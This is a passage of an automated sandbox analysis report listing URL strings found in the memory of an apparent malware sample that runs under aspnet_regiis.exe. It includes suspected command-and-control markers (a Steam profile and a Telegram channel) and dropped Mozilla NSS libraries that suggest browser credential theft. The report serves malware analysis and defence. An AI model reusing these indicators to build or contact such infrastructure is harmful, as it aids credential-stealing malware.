Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: DBFIEH.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: file.exe	String found in binary or memory: https://pidgin.im0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: file.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997804188699&
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869Y
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869x
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: HDGCFH.3.dr	String found in binary or memory: https://support.mozilla.org
Source: HDGCFH.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDGCFH.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
